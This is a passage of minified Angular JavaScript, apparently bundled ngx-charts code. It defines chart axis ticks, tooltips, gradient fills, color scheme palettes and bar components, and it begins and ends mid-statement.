e=parseInt(this.ticksElement.nativeElement.getBoundingClientRect().height,10);e!==this.height&&(this.height=e,this.dimensionsChanged.emit({height:this.height}),setTimeout(()=>this.updateDims()))}update(){const e=this.scale;this.ticks=this.getTicks(),this.tickFormat=this.tickFormatting?this.tickFormatting:e.tickFormat?e.tickFormat.apply(e,this.tickArguments):function(n){return"Date"===n.constructor.name?n.toLocaleDateString():n.toLocaleString()};const i=this.rotateTicks?this.getRotationAngle(this.ticks):null;this.adjustedScale=this.scale.bandwidth?function(n){return this.scale(n)+.5*this.scale.bandwidth()}:this.scale,this.textTransform="",i&&0!==i?(this.textTransform=`rotate(${i})`,this.textAnchor=km.End,this.verticalSpacing=10):this.textAnchor=km.Middle,setTimeout(()=>this.updateDims())}getRotationAngle(e){let i=0;this.maxTicksLength=0;for(let k=0;k<e.length;k++){const q=this.tickFormat(e[k]).toString();let Y=q.length;this.trimTicks&&(Y=this.tickTrim(q).length),Y>this.maxTicksLength&&(this.maxTicksLength=Y)}const c=7*Math.min(this.maxTicksLength,this.maxAllowedLength);let d=c;const T=Math.floor(this.width/e.length);for(;d>T&&i>-90;)i-=30,d=Math.cos(i*(Math.PI/180))*c;return this.approxHeight=Math.max(Math.abs(Math.sin(i*(Math.PI/180))*c),10),i}getTicks(){let e;const i=this.getMaxTicks(20),n=this.getMaxTicks(100);return this.tickValues?e=this.tickValues:this.scale.ticks?e=this.scale.ticks.apply(this.scale,[n]):(e=this.scale.domain(),e=pq(e,i)),e}getMaxTicks(e){return Math.floor(this.width/e)}tickTransform(e){return"translate("+this.adjustedScale(e)+","+this.verticalSpacing+")"}gridLineTransform(){return`translate(0,${-this.verticalSpacing-5})`}tickTrim(e){return this.trimTicks?QI(e,this.maxTickLength):e}}return t.\u0275fac=function(e){return new(e||t)(Ee(lm))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-x-axis-ticks",""]],viewQuery:function(e,i){if(1&e&&Mi(nq,5),2&e){let n;Vt(n=Bt())&&(i.ticksElement=n.first)}},inputs:{scale:"scale",orient:"orient",tickArguments:"tickArguments",tickValues:"tickValues",tickStroke:"tickStroke",trimTicks:"trimTicks",maxTickLength:"maxTickLength",tickFormatting:"tickFormatting",showGridLines:"showGridLines",gridLineHeight:"gridLineHeight",width:"width",rotateTicks:"rotateTicks"},outputs:{dimensionsChanged:"dimensionsChanged"},features:[sa],attrs:fEe,decls:4,vars:2,consts:[["ticksel",""],["class","tick",4,"ngFor","ngForOf"],[4,"ngFor","ngForOf"],[1,"tick"],["stroke-width","0.01"],[4,"ngIf"],["y2","0",1,"gridline-path","gridline-path-vertical"]],template:function(e,i){1&e&&(fi(),m(0,"g",null,0),ne(2,pEe,5,7,"g",1),u(),ne(3,gEe,2,2,"g",2)),2&e&&(C(2),V("ngForOf",i.ticks),C(1),V("ngForOf",i.ticks))},dependencies:[Zi,Ri],encapsulation:2,changeDetection:0}),t})(),_6e=(()=>{class t{constructor(){this.rotateTicks=!0,this.showGridLines=!1,this.xOrient=Fs.Bottom,this.xAxisOffset=0,this.dimensionsChanged=new Tt,this.xAxisClassName="x axis",this.labelOffset=0,this.fill="none",this.stroke="stroke",this.tickStroke="#ccc",this.strokeWidth="none",this.padding=5,this.orientation=Fs}ngOnChanges(e){this.update()}update(){this.transform=`translate(0,${this.xAxisOffset+this.padding+this.dims.height})`,void 0!==this.xAxisTickCount&&(this.tickArguments=[this.xAxisTickCount])}emitTicksHeight({height:e}){const i=e+25+5;i!==this.labelOffset&&(this.labelOffset=i,setTimeout(()=>{this.dimensionsChanged.emit({height:e})},0))}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-x-axis",""]],viewQuery:function(e,i){if(1&e&&Mi(_q,5),2&e){let n;Vt(n=Bt())&&(i.ticksComponent=n.first)}},inputs:{xScale:"xScale",dims:"dims",trimTicks:"trimTicks",rotateTicks:"rotateTicks",maxTickLength:"maxTickLength",tickFormatting:"tickFormatting",showGridLines:"showGridLines",showLabel:"showLabel",labelText:"labelText",ticks:"ticks",xAxisTickCount:"xAxisTickCount",xOrient:"xOrient",xAxisOffset:"xAxisOffset"},outputs:{dimensionsChanged:"dimensionsChanged"},features:[sa],attrs:CEe,decls:3,vars:4,consts:[["ngx-charts-x-axis-ticks","",3,"trimTicks","rotateTicks","maxTickLength","tickFormatting","tickArguments","tickStroke","scale","orient","showGridLines","gridLineHeight","width","tickValues","dimensionsChanged",4,"ngIf"],["ngx-charts-axis-label","",3,"label","offset","orient","height","width",4,"ngIf"],["ngx-charts-x-axis-ticks","",3,"trimTicks","rotateTicks","maxTickLength","tickFormatting","tickArguments","tickStroke","scale","orient","showGridLines","gridLineHeight","width","tickValues","dimensionsChanged"],["ngx-charts-axis-label","",3,"label","offset","orient","height","width"]],template:function(e,i){1&e&&(fi(),m(0,"g"),ne(1,yEe,1,12,"g",0),ne(2,bEe,1,5,"g",1),u()),2&e&&(Rt("class",i.xAxisClassName)("transform",i.transform),C(1),V("ngIf",i.xScale),C(1),V("ngIf",i.showLabel))},dependencies:[_q,fq,Ri],encapsulation:2,changeDetection:0}),t})();function Ip(t,a,e,i,n,[r,c,d,T]){let k="";return k=`M${[t+n,a]}`,k+="h"+((e=0===(e=Math.floor(e))?1:e)-2*n),k+=c?`a${[n,n]} 0 0 1 ${[n,n]}`:`h${n}v${n}`,k+="v"+((i=0===(i=Math.floor(i))?1:i)-2*n),k+=T?`a${[n,n]} 0 0 1 ${[-n,n]}`:`v${n}h${-n}`,k+="h"+(2*n-e),k+=d?`a${[n,n]} 0 0 1 ${[-n,-n]}`:`h${-n}v${-n}`,k+="v"+(2*n-i),k+=r?`a${[n,n]} 0 0 1 ${[n,-n]}`:`v${-n}h${n}`,k+="z",k}let gq=(()=>{class t{constructor(e){this.platformId=e,this.tickArguments=[5],this.tickStroke="#ccc",this.trimTicks=!0,this.maxTickLength=16,this.showGridLines=!1,this.showRefLabels=!1,this.showRefLines=!1,this.dimensionsChanged=new Tt,this.innerTickSize=6,this.tickPadding=3,this.verticalSpacing=20,this.textAnchor=km.Middle,this.width=0,this.outerTickSize=6,this.rotateLabels=!1,this.referenceLineLength=0,this.Orientation=Fs}ngOnChanges(e){this.update()}ngAfterViewInit(){setTimeout(()=>this.updateDims())}updateDims(){if(!ng(this.platformId))return this.width=this.getApproximateAxisWidth(),void this.dimensionsChanged.emit({width:this.width});const e=parseInt(this.ticksElement.nativeElement.getBoundingClientRect().width,10);e!==this.width&&(this.width=e,this.dimensionsChanged.emit({width:e}),setTimeout(()=>this.updateDims()))}update(){let e;const i=this.orient===Fs.Top||this.orient===Fs.Right?-1:1;switch(this.tickSpacing=Math.max(this.innerTickSize,0)+this.tickPadding,e=this.scale,this.ticks=this.getTicks(),this.tickFormat=this.tickFormatting?this.tickFormatting:e.tickFormat?e.tickFormat.apply(e,this.tickArguments):function(n){return"Date"===n.constructor.name?n.toLocaleDateString():n.toLocaleString()},this.adjustedScale=e.bandwidth?function(n){return e(n)+.5*e.bandwidth()}:e,this.showRefLines&&this.referenceLines&&this.setReferencelines(),this.orient){case Fs.Top:case Fs.Bottom:this.transform=function(n){return"translate("+this.adjustedScale(n)+",0)"},this.textAnchor=km.Middle,this.y2=this.innerTickSize*i,this.y1=this.tickSpacing*i,this.dy=i<0?"0em":".71em";break;case Fs.Left:this.transform=function(n){return"translate(0,"+this.adjustedScale(n)+")"},this.textAnchor=km.End,this.x2=this.innerTickSize*-i,this.x1=this.tickSpacing*-i,this.dy=".32em";break;case Fs.Right:this.transform=function(n){return"translate(0,"+this.adjustedScale(n)+")"},this.textAnchor=km.Start,this.x2=this.innerTickSize*-i,this.x1=this.tickSpacing*-i,this.dy=".32em"}setTimeout(()=>this.updateDims())}setReferencelines(){this.refMin=this.adjustedScale(Math.min.apply(null,this.referenceLines.map(e=>e.value))),this.refMax=this.adjustedScale(Math.max.apply(null,this.referenceLines.map(e=>e.value))),this.referenceLineLength=this.referenceLines.length,this.referenceAreaPath=Ip(0,this.refMax,this.gridLineWidth,this.refMin-this.refMax,0,[!1,!1,!1,!1])}getTicks(){let e;const i=this.getMaxTicks(20),n=this.getMaxTicks(50);return this.tickValues?e=this.tickValues:this.scale.ticks?e=this.scale.ticks.apply(this.scale,[n]):(e=this.scale.domain(),e=pq(e,i)),e}getMaxTicks(e){return Math.floor(this.height/e)}tickTransform(e){return`translate(${this.adjustedScale(e)},${this.verticalSpacing})`}gridLineTransform(){return"translate(5,0)"}tickTrim(e){return this.trimTicks?QI(e,this.maxTickLength):e}getApproximateAxisWidth(){return 7*Math.max(...this.ticks.map(n=>this.tickTrim(this.tickFormat(n)).length))}}return t.\u0275fac=function(e){return new(e||t)(Ee(lm))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-y-axis-ticks",""]],viewQuery:function(e,i){if(1&e&&Mi(nq,5),2&e){let n;Vt(n=Bt())&&(i.ticksElement=n.first)}},inputs:{scale:"scale",orient:"orient",tickArguments:"tickArguments",tickValues:"tickValues",tickStroke:"tickStroke",trimTicks:"trimTicks",maxTickLength:"maxTickLength",tickFormatting:"tickFormatting",showGridLines:"showGridLines",gridLineWidth:"gridLineWidth",height:"height",referenceLines:"referenceLines",showRefLabels:"showRefLabels",showRefLines:"showRefLines"},outputs:{dimensionsChanged:"dimensionsChanged"},features:[sa],attrs:MEe,decls:6,vars:4,consts:[["ticksel",""],["class","tick",4,"ngFor","ngForOf"],["class","reference-area",4,"ngIf"],[4,"ngFor","ngForOf"],[1,"tick"],["stroke-width","0.01"],[1,"reference-area"],[4,"ngIf"],["class","gridline-path gridline-path-horizontal","x1","0",4,"ngIf"],["x1","0",1,"gridline-path","gridline-path-horizontal"],["x1","0",1,"refline-path","gridline-path-horizontal"],[1,"refline-label"]],template:function(e,i){1&e&&(fi(),m(0,"g",null,0),ne(2,vEe,5,9,"g",1),u(),ne(3,AEe,1,2,"path",2),ne(4,xEe,2,2,"g",3),ne(5,REe,2,1,"g",3)),2&e&&(C(2),V("ngForOf",i.ticks),C(1),V("ngIf",i.referenceLineLength>1&&i.refMax&&i.refMin&&i.showRefLines),C(1),V("ngForOf",i.ticks),C(1),V("ngForOf",i.referenceLines))},dependencies:[Zi,Ri],encapsulation:2,changeDetection:0}),t})(),g6e=(()=>{class t{constructor(){this.showGridLines=!1,this.yOrient=Fs.Left,this.yAxisOffset=0,this.dimensionsChanged=new Tt,this.yAxisClassName="y axis",this.labelOffset=15,this.fill="none",this.stroke="#CCC",this.tickStroke="#CCC",this.strokeWidth=1,this.padding=5}ngOnChanges(e){this.update()}update(){this.offset=-(this.yAxisOffset+this.padding),this.yOrient===Fs.Right?(this.labelOffset=65,this.transform=`translate(${this.offset+this.dims.width} , 0)`):(this.offset=this.offset,this.transform=`translate(${this.offset} , 0)`),void 0!==this.yAxisTickCount&&(this.tickArguments=[this.yAxisTickCount])}emitTicksWidth({width:e}){e!==this.labelOffset&&this.yOrient===Fs.Right?(this.labelOffset=e+this.labelOffset,setTimeout(()=>{this.dimensionsChanged.emit({width:e})},0)):e!==this.labelOffset&&(this.labelOffset=e,setTimeout(()=>{this.dimensionsChanged.emit({width:e})},0))}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-y-axis",""]],viewQuery:function(e,i){if(1&e&&Mi(gq,5),2&e){let n;Vt(n=Bt())&&(i.ticksComponent=n.first)}},inputs:{yScale:"yScale",dims:"dims",trimTicks:"trimTicks",maxTickLength:"maxTickLength",tickFormatting:"tickFormatting",ticks:"ticks",showGridLines:"showGridLines",showLabel:"showLabel",labelText:"labelText",yAxisTickCount:"yAxisTickCount",yOrient:"yOrient",referenceLines:"referenceLines",showRefLines:"showRefLines",showRefLabels:"showRefLabels",yAxisOffset:"yAxisOffset"},outputs:{dimensionsChanged:"dimensionsChanged"},features:[sa],attrs:SEe,decls:3,vars:4,consts:[["ngx-charts-y-axis-ticks","",3,"trimTicks","maxTickLength","tickFormatting","tickArguments","tickValues","tickStroke","scale","orient","showGridLines","gridLineWidth","referenceLines","showRefLines","showRefLabels","height","dimensionsChanged",4,"ngIf"],["ngx-charts-axis-label","",3,"label","offset","orient","height","width",4,"ngIf"],["ngx-charts-y-axis-ticks","",3,"trimTicks","maxTickLength","tickFormatting","tickArguments","tickValues","tickStroke","scale","orient","showGridLines","gridLineWidth","referenceLines","showRefLines","showRefLabels","height","dimensionsChanged"],["ngx-charts-axis-label","",3,"label","offset","orient","height","width"]],template:function(e,i){1&e&&(fi(),m(0,"g"),ne(1,kEe,1,14,"g",0),ne(2,PEe,1,5,"g",1),u()),2&e&&(Rt("class",i.yAxisClassName)("transform",i.transform),C(1),V("ngIf",i.yScale),C(1),V("ngIf",i.showLabel))},dependencies:[gq,fq,Ri],encapsulation:2,changeDetection:0}),t})(),Cq=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[rn]]}),t})();var Ng=(()=>{return(t=Ng||(Ng={})).popover="popover",t.tooltip="tooltip",Ng;var t})(),Rp=(()=>{return(t=Rp||(Rp={}))[t.all="all"]="all",t[t.focus="focus"]="focus",t[t.mouseover="mouseover"]="mouseover",Rp;var t})();let $I=(()=>{class t{constructor(e,i,n){this.tooltipService=e,this.viewContainerRef=i,this.renderer=n,this.tooltipCssClass="",this.tooltipAppendToBody=!0,this.tooltipSpacing=10,this.tooltipDisabled=!1,this.tooltipShowCaret=!0,this.tooltipPlacement=kn.Top,this.tooltipAlignment=kn.Center,this.tooltipType=Ng.popover,this.tooltipCloseOnClickOutside=!0,this.tooltipCloseOnMouseLeave=!0,this.tooltipHideTimeout=300,this.tooltipShowTimeout=100,this.tooltipShowEvent=Rp.all,this.tooltipImmediateExit=!1,this.show=new Tt,this.hide=new Tt}get listensForFocus(){return this.tooltipShowEvent===Rp.all||this.tooltipShowEvent===Rp.focus}get listensForHover(){return this.tooltipShowEvent===Rp.all||this.tooltipShowEvent===Rp.mouseover}ngOnDestroy(){this.hideTooltip(!0)}onFocus(){this.listensForFocus&&this.showTooltip()}onBlur(){this.listensForFocus&&this.hideTooltip(!0)}onMouseEnter(){this.listensForHover&&this.showTooltip()}onMouseLeave(e){if(this.listensForHover&&this.tooltipCloseOnMouseLeave){if(clearTimeout(this.timeout),this.component&&this.component.instance.element.nativeElement.contains(e))return;this.hideTooltip(this.tooltipImmediateExit)}}onMouseClick(){this.listensForHover&&this.hideTooltip(!0)}showTooltip(e){if(this.component||this.tooltipDisabled)return;const i=e?0:this.tooltipShowTimeout+(navigator.userAgent.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/)?300:0);clearTimeout(this.timeout),this.timeout=setTimeout(()=>{this.tooltipService.destroyAll();const n=this.createBoundOptions();this.component=this.tooltipService.create(n),setTimeout(()=>{this.component&&this.addHideListeners(this.component.instance.element.nativeElement)},10),this.show.emit(!0)},i)}addHideListeners(e){this.mouseEnterContentEvent=this.renderer.listen(e,"mouseenter",()=>{clearTimeout(this.timeout)}),this.tooltipCloseOnMouseLeave&&(this.mouseLeaveContentEvent=this.renderer.listen(e,"mouseleave",()=>{this.hideTooltip(this.tooltipImmediateExit)})),this.tooltipCloseOnClickOutside&&(this.documentClickEvent=this.renderer.listen("window","click",i=>{e.contains(i.target)||this.hideTooltip()}))}hideTooltip(e=!1){if(!this.component)return;const i=()=>{this.mouseLeaveContentEvent&&this.mouseLeaveContentEvent(),this.mouseEnterContentEvent&&this.mouseEnterContentEvent(),this.documentClickEvent&&this.documentClickEvent(),this.hide.emit(!0),this.tooltipService.destroy(this.component),this.component=void 0};clearTimeout(this.timeout),e?i():this.timeout=setTimeout(i,this.tooltipHideTimeout)}createBoundOptions(){return{title:this.tooltipTitle,template:this.tooltipTemplate,host:this.viewContainerRef.element,placement:this.tooltipPlacement,alignment:this.tooltipAlignment,type:this.tooltipType,showCaret:this.tooltipShowCaret,cssClass:this.tooltipCssClass,spacing:this.tooltipSpacing,context:this.tooltipContext}}}return t.\u0275fac=function(e){return new(e||t)(Ee(GI),Ee(fo),Ee(wr))},t.\u0275dir=Ot({type:t,selectors:[["","ngx-tooltip",""]],hostBindings:function(e,i){1&e&&he("focusin",function(){return i.onFocus()})("blur",function(){return i.onBlur()})("mouseenter",function(){return i.onMouseEnter()})("mouseleave",function(r){return i.onMouseLeave(r.target)})("click",function(){return i.onMouseClick()})},inputs:{tooltipCssClass:"tooltipCssClass",tooltipTitle:"tooltipTitle",tooltipAppendToBody:"tooltipAppendToBody",tooltipSpacing:"tooltipSpacing",tooltipDisabled:"tooltipDisabled",tooltipShowCaret:"tooltipShowCaret",tooltipPlacement:"tooltipPlacement",tooltipAlignment:"tooltipAlignment",tooltipType:"tooltipType",tooltipCloseOnClickOutside:"tooltipCloseOnClickOutside",tooltipCloseOnMouseLeave:"tooltipCloseOnMouseLeave",tooltipHideTimeout:"tooltipHideTimeout",tooltipShowTimeout:"tooltipShowTimeout",tooltipTemplate:"tooltipTemplate",tooltipShowEvent:"tooltipShowEvent",tooltipContext:"tooltipContext",tooltipImmediateExit:"tooltipImmediateExit"},outputs:{show:"show",hide:"hide"}}),t})(),yq=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[sq,GI],imports:[[rn]]}),t})();const bq={};function qb(){let t=("0000"+(Math.random()*Math.pow(36,4)<<0).toString(36)).slice(-4);return t=`a${t}`,bq[t]?qb():(bq[t]=!0,t)}var is=(()=>{return(t=is||(is={})).Vertical="vertical",t.Horizontal="horizontal",is;var t})();let KI,cT=(()=>{class t{constructor(){this.orientation=is.Vertical}ngOnChanges(e){this.x1="0%",this.x2="0%",this.y1="0%",this.y2="0%",this.orientation===is.Horizontal?this.x2="100%":this.orientation===is.Vertical&&(this.y1="100%")}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-svg-linear-gradient",""]],inputs:{orientation:"orientation",name:"name",stops:"stops"},features:[sa],attrs:OEe,decls:2,vars:6,consts:[[3,"id"],[3,"stop-color","stop-opacity",4,"ngFor","ngForOf"]],template:function(e,i){1&e&&(fi(),m(0,"linearGradient",0),ne(1,NEe,1,5,"stop",1),u()),2&e&&(V("id",i.name),Rt("x1",i.x1)("y1",i.y1)("x2",i.x2)("y2",i.y2),C(1),V("ngForOf",i.stops))},dependencies:[Zi],encapsulation:2,changeDetection:0}),t})();"undefined"!=typeof window?KI=window:"undefined"!=typeof global&&(KI=global);let Fd=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[rn,Cq,yq],rn,Cq,yq]}),t})(),Dq=[{name:"vivid",selectable:!0,group:Wa.Ordinal,domain:["#647c8a","#3f51b5","#2196f3","#00b862","#afdf0a","#a7b61a","#f3e562","#ff9800","#ff5722","#ff4514"]},{name:"natural",selectable:!0,group:Wa.Ordinal,domain:["#bf9d76","#e99450","#d89f59","#f2dfa7","#a5d7c6","#7794b1","#afafaf","#707160","#ba9383","#d9d5c3"]},{name:"cool",selectable:!0,group:Wa.Ordinal,domain:["#a8385d","#7aa3e5","#a27ea8","#aae3f5","#adcded","#a95963","#8796c0","#7ed3ed","#50abcc","#ad6886"]},{name:"fire",selectable:!0,group:Wa.Ordinal,domain:["#ff3d00","#bf360c","#ff8f00","#ff6f00","#ff5722","#e65100","#ffca28","#ffab00"]},{name:"solar",selectable:!0,group:Wa.Linear,domain:["#fff8e1","#ffecb3","#ffe082","#ffd54f","#ffca28","#ffc107","#ffb300","#ffa000","#ff8f00","#ff6f00"]},{name:"air",selectable:!0,group:Wa.Linear,domain:["#e1f5fe","#b3e5fc","#81d4fa","#4fc3f7","#29b6f6","#03a9f4","#039be5","#0288d1","#0277bd","#01579b"]},{name:"aqua",selectable:!0,group:Wa.Linear,domain:["#e0f7fa","#b2ebf2","#80deea","#4dd0e1","#26c6da","#00bcd4","#00acc1","#0097a7","#00838f","#006064"]},{name:"flame",selectable:!1,group:Wa.Ordinal,domain:["#A10A28","#D3342D","#EF6D49","#FAAD67","#FDDE90","#DBED91","#A9D770","#6CBA67","#2C9653","#146738"]},{name:"ocean",selectable:!1,group:Wa.Ordinal,domain:["#1D68FB","#33C0FC","#4AFFFE","#AFFFFF","#FFFC63","#FDBD2D","#FC8A25","#FA4F1E","#FA141B","#BA38D1"]},{name:"forest",selectable:!1,group:Wa.Ordinal,domain:["#55C22D","#C1F33D","#3CC099","#AFFFFF","#8CFC9D","#76CFFA","#BA60FB","#EE6490","#C42A1C","#FC9F32"]},{name:"horizon",selectable:!1,group:Wa.Ordinal,domain:["#2597FB","#65EBFD","#99FDD0","#FCEE4B","#FEFCFA","#FDD6E3","#FCB1A8","#EF6F7B","#CB96E8","#EFDEE0"]},{name:"neons",selectable:!1,group:Wa.Ordinal,domain:["#FF3333","#FF33FF","#CC33FF","#0000FF","#33CCFF","#33FFFF","#33FF66","#CCFF33","#FFCC00","#FF6600"]},{name:"picnic",selectable:!1,group:Wa.Ordinal,domain:["#FAC51D","#66BD6D","#FAA026","#29BB9C","#E96B56","#55ACD2","#B7332F","#2C83C9","#9166B8","#92E7E8"]},{name:"night",selectable:!1,group:Wa.Ordinal,domain:["#2B1B5A","#501356","#183356","#28203F","#391B3C","#1E2B3C","#120634","#2D0432","#051932","#453080","#75267D","#2C507D","#4B3880","#752F7D","#35547D"]},{name:"nightLights",selectable:!1,group:Wa.Ordinal,domain:["#4e31a5","#9c25a7","#3065ab","#57468b","#904497","#46648b","#32118d","#a00fb3","#1052a2","#6e51bd","#b63cc3","#6c97cb","#8671c1","#b455be","#7496c3"]}];class E6e{constructor(a,e,i,n){"string"==typeof a&&(a=Dq.find(r=>r.name===a)),this.colorDomain=a.domain,this.scaleType=e,this.domain=i,this.customColors=n,this.scale=this.generateColorScheme(a,e,this.domain)}generateColorScheme(a,e,i){let n;switch("string"==typeof a&&(a=Dq.find(r=>r.name===a)),e){case Wa.Quantile:n=iq().range(a.domain).domain(i);break;case Wa.Ordinal:n=qI().range(a.domain).domain(i);break;case Wa.Linear:{const r=[...a.domain];1===r.length&&(r.push(r[0]),this.colorDomain=r);const c=ZU(0,1,1/r.length);n=l2().range(r).domain(c)}}return n}getColor(a){if(null==a)throw new Error("Value can not be null");if(this.scaleType===Wa.Linear){const e=l2().domain(this.domain).range([0,1]);return this.scale(e(a))}{if("function"==typeof this.customColors)return this.customColors(a);const e=a.toString();let i;return this.customColors&&this.customColors.length>0&&(i=this.customColors.find(n=>n.name.toLowerCase()===e.toLowerCase())),i?i.value:this.scale(a)}}getLinearGradientStops(a,e){void 0===e&&(e=this.domain[0]);const i=l2().domain(this.domain).range([0,1]),n=sT().domain(this.colorDomain).range([0,1]),r=this.getColor(a),c=i(e),d=this.getColor(e),T=i(a);let k=1,q=c;const Y=[];for(Y.push({color:d,offset:c,originalOffset:c,opacity:1});q<T&&k<this.colorDomain.length;){const te=this.colorDomain[k],pe=n(te);if(pe<=c)k++;else{if(pe.toFixed(4)>=(T-n.bandwidth()).toFixed(4))break;Y.push({color:te,offset:pe,opacity:1}),q=pe,k++}}if(Y[Y.length-1].offset<100&&Y.push({color:r,offset:T,opacity:1}),T===c)Y[0].offset=0,Y[1].offset=100;else if(100!==Y[Y.length-1].offset)for(const te of Y)te.offset=(te.offset-c)/(T-c)*100;return Y}}let x6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Fd]]}),t})(),w6e=(()=>{class t{constructor(e){this.roundEdges=!0,this.gradient=!1,this.offset=0,this.isActive=!1,this.animations=!0,this.noBarWhenZero=!0,this.select=new Tt,this.activate=new Tt,this.deactivate=new Tt,this.hasGradient=!1,this.hideBar=!1,this.element=e.nativeElement}ngOnChanges(e){e.roundEdges&&this.loadAnimation(),this.update()}update(){this.gradientId="grad"+qb().toString(),this.gradientFill=`url(#${this.gradientId})`,this.gradient||this.stops?(this.gradientStops=this.getGradient(),this.hasGradient=!0):this.hasGradient=!1,this.updatePathEl(),this.checkToHideBar()}loadAnimation(){this.path=this.getStartingPath(),setTimeout(this.update.bind(this),100)}updatePathEl(){const e=function zd(t){return"string"==typeof t?new Rl([[document.querySelector(t)]],[document.documentElement]):new Rl([[t]],vH)}(this.element).select(".bar"),i=this.getPath();this.animations?e.transition().duration(500).attr("d",i):e.attr("d",i)}getGradient(){return this.stops?this.stops:[{offset:0,color:this.fill,opacity:this.getStartOpacity()},{offset:100,color:this.fill,opacity:1}]}getStartingPath(){if(!this.animations)return this.getPath();let i,e=this.getRadius();return this.roundEdges?this.orientation===is.Vertical?(e=Math.min(this.height,e),i=Ip(this.x,this.y+this.height,this.width,1,0,this.edges)):this.orientation===is.Horizontal&&(e=Math.min(this.width,e),i=Ip(this.x,this.y,1,this.height,0,this.edges)):this.orientation===is.Vertical?i=Ip(this.x,this.y+this.height,this.width,1,0,this.edges):this.orientation===is.Horizontal&&(i=Ip(this.x,this.y,1,this.height,0,this.edges)),i}getPath(){let i,e=this.getRadius();return this.roundEdges?this.orientation===is.Vertical?(e=Math.min(this.height,e),i=Ip(this.x,this.y,this.width,this.height,e,this.edges)):this.orientation===is.Horizontal&&(e=Math.min(this.width,e),i=Ip(this.x,this.y,this.width,this.height,e,this.edges)):i=Ip(this.x,this.y,this.width,this.height,e,this.edges),i}getRadius(){let e=0;return this.roundEdges&&this.height>5&&this.width>5&&(e=Math.floor(Math.min(5,this.height/2,this.width/2))),e}getStartOpacity(){return this.roundEdges?.2:.5}get edges(){let e=[!1,!1,!1,!1];return this.roundEdges&&(this.orientation===is.Vertical?e=this.data.value>0?[!0,!0,!1,!1]:[!1,!1,!0,!0]:this.orientation===is.Horizontal&&(e=this.data.value>0?[!1,!0,!1,!0]:[!0,!1,!0,!1])),e}onMouseEnter(){this.activate.emit(this.data)}onMouseLeave(){this.deactivate.emit(this.data)}checkToHideBar(){this.hideBar=this.noBarWhenZero&&(this.orientation===is.Vertical&&0===this.height||this.orientation===is.Horizontal&&0===this.width)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-bar",""]],hostBindings:function(e,i){1&e&&he("mouseenter",function(){return i.onMouseEnter()})("mouseleave",function(){return i.onMouseLeave()})},inputs:{fill:"fill",data:"data",width:"width",height:"height",x:"x",y:"y",orientation:"orientation",roundEdges:"roundEdges",gradient:"gradient",offset:"offset",isActive:"isActive",stops:"stops",animations:"animations",ariaLabel:"ariaLabel",noBarWhenZero:"noBarWhenZero"},outputs:{select:"select",activate:"activate",deactivate:"deactivate"},features:[sa],attrs:_De,decls:2,vars:8,consts:[[4,"ngIf"],["stroke","none","role","img","tabIndex","-1",1,"bar",3,"click"],["ngx-charts-svg-linear-gradient","",3,"orientation","name","stops"]],template:function(e,i){1&e&&(ne(0,gDe,2,3,"defs",0),fi(),m(1,"path",1),he("click",function(){return i.select.emit(i.data)}),u()),2&e&&(V("ngIf",i.hasGradient),C(1),Ct("active",i.isActive)("hidden",i.hideBar),Rt("d",i.path)("aria-label",i.ariaLabel)("fill",i.hasGradient?i.gradientFill:i.fill))},dependencies:[cT,Ri],encapsulation:2,changeDetection:0}),t})();var Pm=(()=>{return(t=Pm||(Pm={})).Standard="standard",t.Normalized="normalized",t.Stacked="stacked",Pm;var t})(),Sp=(()=>{return(t=Sp||(Sp={})).positive="positive",t.negative="negative",Sp;var t})();let I6e=(()=>{class t{constructor(e){this.dimensionsChanged=new Tt,this.horizontalPadding=2,this.verticalPadding=5,this.element=e.nativeElement}ngOnChanges(e){this.update()}getSize(){return{height:this.element.getBoundingClientRect().height,width:this.element.getBoundingClientRect().width,negative:this.value<0}}ngAfterViewInit(){this.dimensionsChanged.emit(this.getSize())}update(){this.formatedValue=this.valueFormatting?this.valueFormatting(this.value):Ub(this.value),"horizontal"===this.orientation?(this.x=this.barX+this.barWidth,this.value<0?(this.x=this.x-this.horizontalPadding,this.textAnchor="end"):(this.x=this.x+this.horizontalPadding,this.textAnchor="start"),this.y=this.barY+this.barHeight/2):(this.x=this.barX+this.barWidth/2,this.y=this.barY+this.barHeight,this.value<0?(this.y=this.y+this.verticalPadding,this.textAnchor="end"):(this.y=this.y-this.verticalPadding,this.textAnchor="start"),this.transform=`rotate(-45, ${this.x} , ${this.y})`)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-bar-label",""]],inputs:{value:"value",valueFormatting:"valueFormatting",barX:"barX",barY:"barY",barWidth:"barWidth",barHeight:"barHeight",orientation:"orientation"},outputs:{dimensionsChanged:"dimensionsChanged"},features:[sa],attrs:CDe,decls:2,vars:5,consts:[["alignment-baseline","middle",1,"textDataLabel"]],template:function(e,i){1&e&&(fi(),m(0,"text",0),s(1),u()),2&e&&(Rt("text-anchor",i.textAnchor)("transform",i.transform)("x",i.x)("y",i.y),C(1),ct(" ",i.formatedValue," "))},styles:[".textDataLabel[_ngcontent-%COMP%]{font-size:11px}"],changeDetection:0}),t})(),R6e=(()=>{class t{constructor(e){this.platformId=e,this.type=Pm.Standard,this.tooltipDisabled=!1,this.animations=!0,this.showDataLabel=!1,this.noBarWhenZero=!0,this.select=new Tt,this.activate=new Tt,this.deactivate=new Tt,this.dataLabelHeightChanged=new Tt,this.barsForDataLabels=[],this.barOrientation=is,this.isSSR=!1}ngOnInit(){Zv(this.platformId)&&(this.isSSR=!0)}ngOnChanges(e){this.update()}update(){let 